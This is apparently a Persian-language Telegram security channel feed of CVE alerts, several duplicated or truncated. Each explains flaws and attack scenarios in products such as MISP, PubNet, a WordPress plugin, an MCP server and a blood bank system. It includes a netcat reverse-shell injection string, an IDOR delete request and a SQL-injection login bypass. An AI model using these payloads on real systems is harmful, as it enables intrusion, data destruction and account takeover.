CVE-2025-58303 در ماژول مربوط به فریمورک ضبط صفحه نمایش (Screen Recording) شناسایی شده است.این نقص امنیتی زمانی رخ میدهد که برنامه پس از آزاد کردن یک بخش از حافظه، همچنان تلاش میکند از آن استفاده کند. این امر منجر به خرابی حافظه و رفتار غیرقابل پیشبینی در برنامه میشود.
💥 میزان تأثیر:
بهرهبرداری موفق از این آسیبپذیری میتواند به طور مستقیم بر در دسترس بودن (Availability) سیستم تأثیر بگذارد.
در بدترین حالت، این نقص امنیتی میتواند منجر به یک حمله محرومسازی از سرویس (Denial of Service - DoS) شود. این امر با از کار انداختن فرآیند ضبط صفحه یا حتی کل رابط کاربری سیستم، دستگاه را غیرقابل استفاده کرده و کاربر را مجبور به راهاندازی مجدد آن میکند.
🎬 سناریوی حمله:
مهاجم میتواند یک اپلیکیشن مخرب طراحی کند که از کاربر درخواست مجوز برای ضبط صفحه نمایش را مینماید.
پس از دریافت مجوز، اپلیکیشن با ارسال دادههای دستکاریشده و غیرمنتظره به فریمورک ضبط صفحه، باعث ایجاد یک وضعیت Use-After-Free میشود. این عمل با مجبور کردن سیستم به آزاد کردن حافظه در حین استفاده از آن صورت میگیرد. در نتیجه، سرویس مربوطه دچار اختلال شده و از کار میافتد (Crash) و در نهایت منجر به قفل شدن یا راهاندازی مجدد دستگاه میشود.
---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-58302
🟠 Risk Level: HIGH (Score: 8.4)
تحلیل آسیبپذیری: CVE-2025-58302
شرح آسیبپذیری:
آسیبپذیری با شناسه
تأثیرات و پیامدها:
مهمترین پیامد بهرهبرداری موفق از این آسیبپذیری، نقض محرمانگی اطلاعات (Confidentiality) است. این امر میتواند منجر به افشای دادههای حساس کاربران، تنظیمات محرمانه سرویس، یا اطلاعات شخصی ذخیرهشده در برنامه شود. در نتیجه، حریم خصوصی کاربران به خطر افتاده و امکان سوءاستفاده از اطلاعات فاششده توسط مهاجمان وجود خواهد داشت.
سناریوی حمله:
یک مهاجم با دسترسی سطح پایین به سیستم (یا از طریق یک اپلیکیشن مخرب نصبشده روی دستگاه کاربر) را در نظر بگیرید. مهاجم با ارسال یک درخواست دستکاریشده و خاص به ماژول تنظیمات، از این نقص بهرهبرداری میکند. به دلیل ضعف در مکانیزم بررسی مجوزها، سیستم قادر به تشخیص درخواست غیرمجاز نبوده و در نتیجه، دسترسی به یک بخش محافظتشده از تنظیمات را برای مهاجم فراهم میکند. برای مثال، مهاجم ممکن است بتواند به اطلاعاتی مانند توکنهای احراز هویت (Session Tokens) یا دادههای خصوصی کاربر دسترسی پیدا کرده و آنها را استخراج نماید.
---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.4)
تحلیل آسیبپذیری: CVE-2025-58302
شرح آسیبپذیری:
آسیبپذیری با شناسه
CVE-2025-58302 به یک نقص امنیتی جدی در بخش کنترل دسترسیها (Permission Control) در ماژول تنظیمات اشاره دارد. این ضعف به یک عامل مخرب اجازه میدهد تا محدودیتهای امنیتی تعریفشده را دور زده و به بخشهایی از تنظیمات دسترسی پیدا کند که در حالت عادی مجاز به مشاهده یا تغییر آنها نیست.تأثیرات و پیامدها:
مهمترین پیامد بهرهبرداری موفق از این آسیبپذیری، نقض محرمانگی اطلاعات (Confidentiality) است. این امر میتواند منجر به افشای دادههای حساس کاربران، تنظیمات محرمانه سرویس، یا اطلاعات شخصی ذخیرهشده در برنامه شود. در نتیجه، حریم خصوصی کاربران به خطر افتاده و امکان سوءاستفاده از اطلاعات فاششده توسط مهاجمان وجود خواهد داشت.
سناریوی حمله:
یک مهاجم با دسترسی سطح پایین به سیستم (یا از طریق یک اپلیکیشن مخرب نصبشده روی دستگاه کاربر) را در نظر بگیرید. مهاجم با ارسال یک درخواست دستکاریشده و خاص به ماژول تنظیمات، از این نقص بهرهبرداری میکند. به دلیل ضعف در مکانیزم بررسی مجوزها، سیستم قادر به تشخیص درخواست غیرمجاز نبوده و در نتیجه، دسترسی به یک بخش محافظتشده از تنظیمات را برای مهاجم فراهم میکند. برای مثال، مهاجم ممکن است بتواند به اطلاعاتی مانند توکنهای احراز هویت (Session Tokens) یا دادههای خصوصی کاربر دسترسی پیدا کرده و آنها را استخراج نماید.
---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-66384
🟠 Risk Level: HIGH (Score: 8.2)
تحلیل آسیبپذیری | CVE-2025-66384
🐞 توضیحات آسیبپذیری:
آسیبپذیری با شناسه
⚠️ تأثیر:
بهرهبرداری موفقیتآمیز از این آسیبپذیری میتواند منجر به اجرای کد از راه دور (RCE) بر روی سرور میزبان MISP شود. این بدان معناست که یک مهاجم میتواند کنترل کامل سرور را به دست آورد، به تمام اطلاعات حساس و طبقهبندیشده ذخیره شده در پلتفرم (مانند شاخصهای نفوذ - IoC) دسترسی پیدا کرده، آنها را سرقت یا دستکاری کند و یا از سرور آلوده به عنوان نقطهای برای حملات بیشتر به زیرساخت شبکه داخلی سازمان استفاده نماید.
🎬 سناریو:
یک مهاجم با داشتن یک حساب کاربری معتبر در پلتفرم MISP، یک فایل مخرب (به عنوان مثال، یک وبشل با پسوند PHP) را با نامی فریبنده شبیه به یک فایل تصویر (مثلاً
---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.2)
تحلیل آسیبپذیری | CVE-2025-66384
🐞 توضیحات آسیبپذیری:
آسیبپذیری با شناسه
CVE-2025-66384 در پلتفرم اشتراکگذاری اطلاعات بدافزار (MISP) در نسخههای قبل از 2.5.24 شناسایی شده است. نقص اصلی در فایل app/Controller/EventsController.php قرار دارد و به دلیل وجود منطق نادرست در فرآیند اعتبارسنجی فایلهای آپلود شده به وجود آمده است. به طور خاص، نحوه بررسی فایل موقت (tmp_name) در هنگام آپلود ضعیف بوده و به یک مهاجم اجازه میدهد تا مکانیزمهای امنیتی را دور زده و یک فایل مخرب را بارگذاری کند.⚠️ تأثیر:
بهرهبرداری موفقیتآمیز از این آسیبپذیری میتواند منجر به اجرای کد از راه دور (RCE) بر روی سرور میزبان MISP شود. این بدان معناست که یک مهاجم میتواند کنترل کامل سرور را به دست آورد، به تمام اطلاعات حساس و طبقهبندیشده ذخیره شده در پلتفرم (مانند شاخصهای نفوذ - IoC) دسترسی پیدا کرده، آنها را سرقت یا دستکاری کند و یا از سرور آلوده به عنوان نقطهای برای حملات بیشتر به زیرساخت شبکه داخلی سازمان استفاده نماید.
🎬 سناریو:
یک مهاجم با داشتن یک حساب کاربری معتبر در پلتفرم MISP، یک فایل مخرب (به عنوان مثال، یک وبشل با پسوند PHP) را با نامی فریبنده شبیه به یک فایل تصویر (مثلاً
report.jpg) آماده میکند. سپس، مهاجم وارد بخش ایجاد یا ویرایش یک "رویداد" (Event) شده و فایل مخرب خود را به عنوان ضمیمه آپلود میکند. به دلیل نقص منطقی در کد، سیستم قادر به تشخیص ماهیت واقعی فایل نیست و آن را در یک مسیر قابل دسترس بر روی سرور ذخیره میکند. در نهایت، مهاجم با فراخوانی مستقیم آدرس فایل آپلود شده از طریق مرورگر، کدهای مخرب را اجرا کرده و به سرور دسترسی کامل پیدا میکند.---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-65112
🔴 Risk Level: CRITICAL (Score: 9.4)
تحلیل آسیبپذیری
---
شرح آسیبپذیری:
آسیبپذیری با شناسه
این نقص امنیتی به دلیل عدم اعتبارسنجی صحیح هویت کاربر در هنگام آپلود پکیج رخ میدهد و به مهاجمان اجازه میدهد خود را به عنوان توسعهدهندگان معتبر جا بزنند. نسخه
تأثیرات:
بهرهبرداری موفق از این آسیبپذیری میتواند منجر به عواقب جدی زیر شود:
▪️ جعل هویت (Identity Spoofing): مهاجم میتواند با جعل هویت یک توسعهدهنده معتبر، پکیجهای مخرب را منتشر کرده و اعتماد سایر کاربران را جلب کند.
▪️ افزایش سطح دسترسی (Privilege Escalation): یک کاربر غیرمجاز میتواند با آپلود پکیج به نام یک کاربر با دسترسی بالاتر (مانند مدیر)، عملاً به سطح دسترسی او در اکوسیستم مدیریت پکیج دست یابد.
▪️ حملات زنجیره تأمین (Supply Chain Attacks): این جدیترین پیامد است. با تزریق پکیجهای آلوده به مخزن، پروژههای دیگری که از این پکیجها به عنوان وابستگی (dependency) استفاده میکنند، در معرض خطر قرار گرفته و بدافزار به طور گسترده در زنجیره تأمین نرمافزار پخش میشود.
سناریوی حمله:
یک سناریوی حمله محتمل به شرح زیر است:
۱. مهاجم یک سرور
۲. مهاجم شناسه کاربری (
۳. سپس، یک نسخه مخرب از یکی از پکیجهای محبوب آن توسعهدهنده ایجاد میکند و یک بدافزار (مثلاً یک ابزار سرقت اطلاعات) را در آن جاسازی میکند.
۴. مهاجم یک درخواست به نقطه پایانی
۵. سرور
۶. سایر توسعهدهندگان و سیستمهای CI/CD به صورت خودکار این «بهروزرسانی» را دریافت کرده و ناآگاهانه کد مخرب را در پروژههای خود وارد میکنند و باعث یک نفوذ گسترده میشوند.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🔴 Risk Level: CRITICAL (Score: 9.4)
تحلیل آسیبپذیری
CVE-2025-65112 در سرویس PubNet---
شرح آسیبپذیری:
آسیبپذیری با شناسه
CVE-2025-65112 در سرویس میزبانی پکیجهای Dart و Flutter به نام PubNet شناسایی شده است. در نسخههای قبل از 1.1.3، نقطه پایانی (endpoint) به آدرس /api/storage/upload به کاربران احرازهویتنشده اجازه میدهد تا با ارسال یک شناسه نویسنده (author-id) دلخواه، پکیجهایی را به نام هر کاربر دیگری آپلود کنند.این نقص امنیتی به دلیل عدم اعتبارسنجی صحیح هویت کاربر در هنگام آپلود پکیج رخ میدهد و به مهاجمان اجازه میدهد خود را به عنوان توسعهدهندگان معتبر جا بزنند. نسخه
1.1.3 این مشکل را برطرف کرده است.تأثیرات:
بهرهبرداری موفق از این آسیبپذیری میتواند منجر به عواقب جدی زیر شود:
▪️ جعل هویت (Identity Spoofing): مهاجم میتواند با جعل هویت یک توسعهدهنده معتبر، پکیجهای مخرب را منتشر کرده و اعتماد سایر کاربران را جلب کند.
▪️ افزایش سطح دسترسی (Privilege Escalation): یک کاربر غیرمجاز میتواند با آپلود پکیج به نام یک کاربر با دسترسی بالاتر (مانند مدیر)، عملاً به سطح دسترسی او در اکوسیستم مدیریت پکیج دست یابد.
▪️ حملات زنجیره تأمین (Supply Chain Attacks): این جدیترین پیامد است. با تزریق پکیجهای آلوده به مخزن، پروژههای دیگری که از این پکیجها به عنوان وابستگی (dependency) استفاده میکنند، در معرض خطر قرار گرفته و بدافزار به طور گسترده در زنجیره تأمین نرمافزار پخش میشود.
سناریوی حمله:
یک سناریوی حمله محتمل به شرح زیر است:
۱. مهاجم یک سرور
PubNet را که از نسخهای قدیمیتر از 1.1.3 استفاده میکند، شناسایی میکند.۲. مهاجم شناسه کاربری (
author-id) یک توسعهدهنده معتبر و شناختهشده در آن سرور را به دست میآورد.۳. سپس، یک نسخه مخرب از یکی از پکیجهای محبوب آن توسعهدهنده ایجاد میکند و یک بدافزار (مثلاً یک ابزار سرقت اطلاعات) را در آن جاسازی میکند.
۴. مهاجم یک درخواست به نقطه پایانی
/api/storage/upload ارسال کرده و ضمن آپلود پکیج آلوده، شناسه توسعهدهنده معتبر را به عنوان author-id در درخواست خود مشخص میکند.۵. سرور
PubNet بدون بررسی هویت واقعی آپلودکننده، پکیج را میپذیرد و آن را به عنوان یک نسخه جدید و قانونی از پکیج اصلی منتشر میکند.۶. سایر توسعهدهندگان و سیستمهای CI/CD به صورت خودکار این «بهروزرسانی» را دریافت کرده و ناآگاهانه کد مخرب را در پروژههای خود وارد میکنند و باعث یک نفوذ گسترده میشوند.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-13615
🔴 Risk Level: CRITICAL (Score: 9.8)
تحلیل آسیبپذیری
با سلام و احترام، گزارش تحلیل آسیبپذیری جدید در افزونه وردپرس به شرح زیر ارائه میگردد:
آسیبپذیری:
آسیبپذیری از نوع تغییر رمز عبور произвольный کاربر (Arbitrary User Password Change) در افزونه
علت اصلی این آسیبپذیری، نقص در کنترل دسترسی به آبجکتهای کاربری است. این نقص به یک مهاجم احراز هویت نشده اجازه میدهد تا مکانیزمهای مجوزدهی را دور زده و به منابع سیستمی، از جمله اطلاعات حسابهای کاربری، دسترسی پیدا کند.
نکته مهم: بهرهبرداری از این آسیبپذیری تنها در صورتی امکانپذیر است که گزینه "فیلدهای رمز عبور ثبتنام" (registration password fields) در تنظیمات پوسته فعال باشد.
تأثیر:
سطح تأثیر این آسیبپذیری بحرانی (Critical) ارزیابی میشود. یک مهاجم میتواند بدون نیاز به نام کاربری و رمز عبور، رمز عبور هر کاربری را در وبسایت، از جمله حساب
پیامدهای اصلی عبارتند از:
- تصاحب کامل حساب کاربری (Account Takeover): مهاجم کنترل کامل حساب کاربری قربانی را به دست میگیرد.
- دسترسی کامل به وبسایت: در صورت هدف قرار دادن حساب مدیر، مهاجم کنترل کامل وبسایت را به دست میآورد.
- سرقت اطلاعات: امکان دسترسی و سرقت اطلاعات حساس کاربران و وبسایت.
- تخریب و آسیب به اعتبار: مهاجم میتواند محتوای سایت را تغییر دهد، بدافزار تزریق کند یا وبسایت را از دسترس خارج نماید.
سناریو حمله:
یک سناریوی محتمل برای بهرهبرداری از این آسیبپذیری به شرح زیر است:
۱. مهاجم یک وبسایت وردپرسی را که از نسخه آسیبپذیر افزونه
۲. مهاجم بررسی میکند که آیا گزینه "فیلدهای رمز عبور ثبتنام" در تنظیمات پوسته فعال است یا خیر.
۳. مهاجم یک درخواست دستکاریشده (malicious request) به سمت وبسایت ارسال میکند. این درخواست حاوی نام کاربری قربانی (مثلاً
۴. به دلیل نقص در منطق برنامه، افزونه این درخواست را بدون بررسی هویت و مجوز درخواستکننده پردازش میکند.
۵. رمز عبور حساب کاربری مورد نظر (مثلاً
۶. در نهایت، مهاجم با استفاده از نام کاربری و رمز عبور جدید وارد سیستم شده و کنترل کامل حساب را به دست میگیرد.
---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🔴 Risk Level: CRITICAL (Score: 9.8)
تحلیل آسیبپذیری
CVE-2025-13615با سلام و احترام، گزارش تحلیل آسیبپذیری جدید در افزونه وردپرس به شرح زیر ارائه میگردد:
آسیبپذیری:
آسیبپذیری از نوع تغییر رمز عبور произвольный کاربر (Arbitrary User Password Change) در افزونه
StreamTube Core برای وردپرس شناسایی شده است. این ضعف امنیتی تمام نسخههای 4.78 و قدیمیتر را تحت تأثیر قرار میدهد.علت اصلی این آسیبپذیری، نقص در کنترل دسترسی به آبجکتهای کاربری است. این نقص به یک مهاجم احراز هویت نشده اجازه میدهد تا مکانیزمهای مجوزدهی را دور زده و به منابع سیستمی، از جمله اطلاعات حسابهای کاربری، دسترسی پیدا کند.
نکته مهم: بهرهبرداری از این آسیبپذیری تنها در صورتی امکانپذیر است که گزینه "فیلدهای رمز عبور ثبتنام" (registration password fields) در تنظیمات پوسته فعال باشد.
تأثیر:
سطح تأثیر این آسیبپذیری بحرانی (Critical) ارزیابی میشود. یک مهاجم میتواند بدون نیاز به نام کاربری و رمز عبور، رمز عبور هر کاربری را در وبسایت، از جمله حساب
administrator (مدیر کل)، تغییر دهد.پیامدهای اصلی عبارتند از:
- تصاحب کامل حساب کاربری (Account Takeover): مهاجم کنترل کامل حساب کاربری قربانی را به دست میگیرد.
- دسترسی کامل به وبسایت: در صورت هدف قرار دادن حساب مدیر، مهاجم کنترل کامل وبسایت را به دست میآورد.
- سرقت اطلاعات: امکان دسترسی و سرقت اطلاعات حساس کاربران و وبسایت.
- تخریب و آسیب به اعتبار: مهاجم میتواند محتوای سایت را تغییر دهد، بدافزار تزریق کند یا وبسایت را از دسترس خارج نماید.
سناریو حمله:
یک سناریوی محتمل برای بهرهبرداری از این آسیبپذیری به شرح زیر است:
۱. مهاجم یک وبسایت وردپرسی را که از نسخه آسیبپذیر افزونه
StreamTube Core استفاده میکند، شناسایی میکند.۲. مهاجم بررسی میکند که آیا گزینه "فیلدهای رمز عبور ثبتنام" در تنظیمات پوسته فعال است یا خیر.
۳. مهاجم یک درخواست دستکاریشده (malicious request) به سمت وبسایت ارسال میکند. این درخواست حاوی نام کاربری قربانی (مثلاً
admin) و رمز عبور جدید مورد نظر مهاجم است.۴. به دلیل نقص در منطق برنامه، افزونه این درخواست را بدون بررسی هویت و مجوز درخواستکننده پردازش میکند.
۵. رمز عبور حساب کاربری مورد نظر (مثلاً
admin) به رمز عبور جدیدی که مهاجم ارسال کرده، تغییر مییابد.۶. در نهایت، مهاجم با استفاده از نام کاربری و رمز عبور جدید وارد سیستم شده و کنترل کامل حساب را به دست میگیرد.
---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
👾1
🚨 New Vulnerability Alert: CVE-2025-35028
🔴 Risk Level: CRITICAL (Score: 9.1)
تحلیل آسیبپذیری | CVE-2025-35028
#Vulnerability #RCE #CommandInjection
---
📝 شرح آسیبپذیری:
یک آسیبپذیری حیاتی از نوع تزریق دستور (Command Injection) در کلاس
این آسیبپذیری به مهاجم اجازه میدهد با ارسال یک آرگومان خط فرمان که با کاراکتر سمیکالن (
💥 تاثیرات:
مهمترین پیامد این آسیبپذیری، اجرای کد از راه دور (Remote Code Execution - RCE) با بالاترین سطح دسترسی ممکن است. از آنجایی که سرور MCP معمولاً با دسترسی کاربر
تاثیرات بالقوه شامل موارد زیر است:
- سرقت، تغییر یا حذف کامل دادههای حساس.
- نصب بدافزار، روتکیت یا ایجاد درهای پشتی (Backdoor).
- استفاده از سرور قربانی برای حمله به سایر سیستمهای داخل شبکه.
- از کار انداختن کامل سرویس (Denial of Service).
🎭 سناریوی حمله:
یک مهاجم، API endpoint آسیبپذیر را شناسایی کرده و یک درخواست مخرب ایجاد میکند. در این درخواست، یکی از آرگومانهای ارسالی به شکل زیر خواهد بود:
سرور MCP این ورودی را بدون هیچگونه بررسی دریافت کرده و یک دستور سیستمی مشابه زیر را در سمت سرور ترکیب و اجرا میکند:
به دلیل وجود کاراکتر
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🔴 Risk Level: CRITICAL (Score: 9.1)
تحلیل آسیبپذیری | CVE-2025-35028
#Vulnerability #RCE #CommandInjection
---
📝 شرح آسیبپذیری:
یک آسیبپذیری حیاتی از نوع تزریق دستور (Command Injection) در کلاس
EnhancedCommandExecutor مربوط به سرور HexStrike AI MCP شناسایی شده است. این مشکل در نسخه مربوط به کامیت 2f3a5512 (سپتامبر ۲۰۲۵) وجود دارد.این آسیبپذیری به مهاجم اجازه میدهد با ارسال یک آرگومان خط فرمان که با کاراکتر سمیکالن (
;) شروع میشود به یکی از نقاط پایانی API (API endpoint)، دستورات دلخواه خود را بر روی سرور اجرا کند. در پیکربندی پیشفرض، سرور هیچگونه پاکسازی (Sanitization) یا اعتبارسنجی روی این ورودیها انجام نمیدهد و دستور مخرب مستقیماً به پوسته سیستمعامل (Shell) ارسال میشود.💥 تاثیرات:
مهمترین پیامد این آسیبپذیری، اجرای کد از راه دور (Remote Code Execution - RCE) با بالاترین سطح دسترسی ممکن است. از آنجایی که سرور MCP معمولاً با دسترسی کاربر
root اجرا میشود، بهرهبرداری موفق از این حفره امنیتی به مهاجم کنترل کامل سرور را میدهد.تاثیرات بالقوه شامل موارد زیر است:
- سرقت، تغییر یا حذف کامل دادههای حساس.
- نصب بدافزار، روتکیت یا ایجاد درهای پشتی (Backdoor).
- استفاده از سرور قربانی برای حمله به سایر سیستمهای داخل شبکه.
- از کار انداختن کامل سرویس (Denial of Service).
🎭 سناریوی حمله:
یک مهاجم، API endpoint آسیبپذیر را شناسایی کرده و یک درخواست مخرب ایجاد میکند. در این درخواست، یکی از آرگومانهای ارسالی به شکل زیر خواهد بود:
; nc -e /bin/bash 192.168.1.100 4444سرور MCP این ورودی را بدون هیچگونه بررسی دریافت کرده و یک دستور سیستمی مشابه زیر را در سمت سرور ترکیب و اجرا میکند:
/path/to/tool --parameter 'some_value' ; nc -e /bin/bash 192.168.1.100 4444به دلیل وجود کاراکتر
;، سیستمعامل دستور اول را خاتمه داده و دستور دوم (ایجاد یک reverse shell به سمت مهاجم) را به عنوان یک دستور کاملاً مجزا با دسترسی root اجرا میکند. در نتیجه، مهاجم یک شل با دسترسی کامل روی سرور هدف به دست میآورد.🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-63525
🔴 Risk Level: CRITICAL (Score: 9.6)
گزارش تحلیل آسیبپذیری: CVE-2025-63525
🚨 شرح آسیبپذیری:
آسیبپذیری با شناسه
ریشه مشکل در عدم بررسی صحیح مجوزهای کاربر درخواستدهنده توسط اسکریپت
💥 میزان تأثیر:
بهرهبرداری موفق از این آسیبپذیری میتواند منجر به پیامدهای جدی شود:
یکپارچگی دادهها: مهاجم قادر خواهد بود اطلاعات حیاتی مانند سوابق اهداکنندگان، موجودی بانک خون، یا حتی حسابهای کاربری دیگر (شامل مدیران) را به صورت غیرمجاز حذف کند.
ممانعت از سرویس (DoS): با حذف دادههای کلیدی یا حسابهای کاربری اصلی، عملکرد کل سیستم مختل شده و از دسترس کاربران قانونی خارج میشود.
پتانسیل حملات بیشتر: این آسیبپذیری میتواند به عنوان نقطهای برای حملات زنجیرهای مورد استفاده قرار گیرد و امنیت کلی سیستم را به خطر اندازد.
---
🎭 سناریوی حمله:
۱. مهاجم یک حساب کاربری با سطح دسترسی پایین در سیستم مدیریت بانک خون ثبت میکند.
۲. پس از ورود به سیستم، با ابزارهای مانیتورینگ ترافیک، درخواستهای ارسالی به سرور را تحلیل میکند و متوجه میشود که عملیات حذف از طریق فایلی به نام
۳. مهاجم با حدس زدن یا شمارش (Enumeration)، شناسهی (ID) رکوردهای مهمی را که به آنها دسترسی ندارد (مانند سوابق بیماران یا کاربران دیگر) پیدا میکند.
۴. سپس یک درخواست HTTP دستکاریشده را مستقیماً به سرور ارسال میکند. برای مثال، برای حذف رکورد یک کاربر دیگر با شناسه
۵. از آنجایی که اسکریپت
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🔴 Risk Level: CRITICAL (Score: 9.6)
گزارش تحلیل آسیبپذیری: CVE-2025-63525
🚨 شرح آسیبپذیری:
آسیبپذیری با شناسه
CVE-2025-63525 در سیستم مدیریت بانک خون نسخه 1.0 شناسایی شده است. این ضعف امنیتی از نوع "افزایش سطح دسترسی" (Privilege Escalation) است. یک مهاجم که به سیستم دسترسی احرازهویتشده (Authenticated) دارد، حتی با کمترین سطح دسترسی، میتواند با ارسال یک درخواست دستکاریشده به فایل delete.php، اقدام به حذف رکوردهایی کند که مجوز آن را ندارد.ریشه مشکل در عدم بررسی صحیح مجوزهای کاربر درخواستدهنده توسط اسکریپت
delete.php است. در واقع، سیستم فقط "هویت" کاربر را بررسی میکند نه "اختیارات" او را برای انجام عمل حذف.💥 میزان تأثیر:
بهرهبرداری موفق از این آسیبپذیری میتواند منجر به پیامدهای جدی شود:
یکپارچگی دادهها: مهاجم قادر خواهد بود اطلاعات حیاتی مانند سوابق اهداکنندگان، موجودی بانک خون، یا حتی حسابهای کاربری دیگر (شامل مدیران) را به صورت غیرمجاز حذف کند.
ممانعت از سرویس (DoS): با حذف دادههای کلیدی یا حسابهای کاربری اصلی، عملکرد کل سیستم مختل شده و از دسترس کاربران قانونی خارج میشود.
پتانسیل حملات بیشتر: این آسیبپذیری میتواند به عنوان نقطهای برای حملات زنجیرهای مورد استفاده قرار گیرد و امنیت کلی سیستم را به خطر اندازد.
---
🎭 سناریوی حمله:
۱. مهاجم یک حساب کاربری با سطح دسترسی پایین در سیستم مدیریت بانک خون ثبت میکند.
۲. پس از ورود به سیستم، با ابزارهای مانیتورینگ ترافیک، درخواستهای ارسالی به سرور را تحلیل میکند و متوجه میشود که عملیات حذف از طریق فایلی به نام
delete.php و با یک پارامتر ID (مثلاً id=123) انجام میشود.۳. مهاجم با حدس زدن یا شمارش (Enumeration)، شناسهی (ID) رکوردهای مهمی را که به آنها دسترسی ندارد (مانند سوابق بیماران یا کاربران دیگر) پیدا میکند.
۴. سپس یک درخواست HTTP دستکاریشده را مستقیماً به سرور ارسال میکند. برای مثال، برای حذف رکورد یک کاربر دیگر با شناسه
456، درخواستی مشابه زیر ارسال میکند:GET /delete.php?user_id=456۵. از آنجایی که اسکریپت
delete.php سطح دسترسی کاربر را برای حذف رکورد با شناسه 456 بررسی نمیکند، درخواست مخرب را پردازش کرده و رکورد مورد نظر را حذف میکند. به این ترتیب، مهاجم با موفقیت یکپارچگی دادههای سیستم را نقض میکند.🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-63531
🔴 Risk Level: CRITICAL (Score: 10.0)
🔎 شرح آسیبپذیری:
یک آسیبپذیری از نوع تزریق SQL با شناسه
این ضعف امنیتی در کامپوننت
---
⚠️ تأثیر:
اصلیترین پیامد این آسیبپذیری، دور زدن کامل سیستم احراز هویت است.
مهاجم میتواند بدون نیاز به نام کاربری و رمز عبور معتبر، به پنل مدیریت یا بخشهای حساس سیستم دسترسی غیرمجاز پیدا کند. این دسترسی میتواند منجر به سرقت، تغییر یا حذف اطلاعات حساس بیماران، اهداکنندگان و سوابق پزشکی ذخیرهشده در سیستم شود.
---
🎯 سناریوی حمله:
۱. مهاجم به صفحه ورود سیستم (
۲. در فیلد ایمیل یا رمز عبور، به جای اطلاعات واقعی، یک قطعه کد SQL مخرب مانند
۳. سرور این ورودی را بدون پاکسازی در کوئری پایگاه داده قرار میدهد. کوئری نهایی چیزی شبیه به
۴. شرط
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🔴 Risk Level: CRITICAL (Score: 10.0)
🔎 شرح آسیبپذیری:
یک آسیبپذیری از نوع تزریق SQL با شناسه
CVE-2025-63531 در سیستم مدیریت بانک خون نسخه 1.0 شناسایی شده است.این ضعف امنیتی در کامپوننت
receiverLogin.php وجود دارد. مشکل اصلی، عدم پاکسازی و اعتبارسنجی صحیح ورودیهای کاربر در فیلدهای remail و rpassword است. در نتیجه، یک مهاجم میتواند با ارسال مقادیر دستکاریشده، کدهای SQL دلخواه خود را به کوئری پایگاه داده تزریق کند.---
⚠️ تأثیر:
اصلیترین پیامد این آسیبپذیری، دور زدن کامل سیستم احراز هویت است.
مهاجم میتواند بدون نیاز به نام کاربری و رمز عبور معتبر، به پنل مدیریت یا بخشهای حساس سیستم دسترسی غیرمجاز پیدا کند. این دسترسی میتواند منجر به سرقت، تغییر یا حذف اطلاعات حساس بیماران، اهداکنندگان و سوابق پزشکی ذخیرهشده در سیستم شود.
---
🎯 سناریوی حمله:
۱. مهاجم به صفحه ورود سیستم (
receiverLogin.php) مراجعه میکند.۲. در فیلد ایمیل یا رمز عبور، به جای اطلاعات واقعی، یک قطعه کد SQL مخرب مانند
' OR '1'='1' -- وارد میکند.۳. سرور این ورودی را بدون پاکسازی در کوئری پایگاه داده قرار میدهد. کوئری نهایی چیزی شبیه به
SELECT * FROM users WHERE remail = '' OR '1'='1' -- ' AND rpassword = '...' خواهد بود.۴. شرط
'1'='1' همیشه درست (True) ارزیابی میشود و باعث میشود پایگاه داده اولین رکورد کاربر را بازگردانده و سیستم به اشتباه تصور کند که احراز هویت موفقیتآمیز بوده است. در نتیجه، مهاجم با سطح دسترسی کاربر قربانی به سیستم وارد میشود.🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2024-48882
🟠 Risk Level: HIGH (Score: 8.6)
گزارش تحلیل آسیبپذیری:
عنوان: منع سرویس در تجهیزات Socomec DIRIS Digiware M-70
📄 شرح آسیبپذیری:
یک آسیبپذیری از نوع «منع سرویس» (Denial of Service) در عملکرد پروتکل
💥 تأثیر:
یک مهاجم بدون نیاز به احراز هویت (Unauthenticated) میتواند با ارسال یک بسته مخرب به دستگاه هدف، باعث از کار افتادن و عدم پاسخگویی کامل آن شود. این حمله منجر به یک وضعیت منع سرویس (DoS) شده و میتواند عملیاتهای حیاتی مانیتورینگ و کنترل صنعتی که به این تجهیز وابسته هستند را مختل سازد.
🎭 سناریوی حمله:
مهاجمی که به شبکه محلی دستگاه آسیبپذیر دسترسی دارد، یک بسته
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
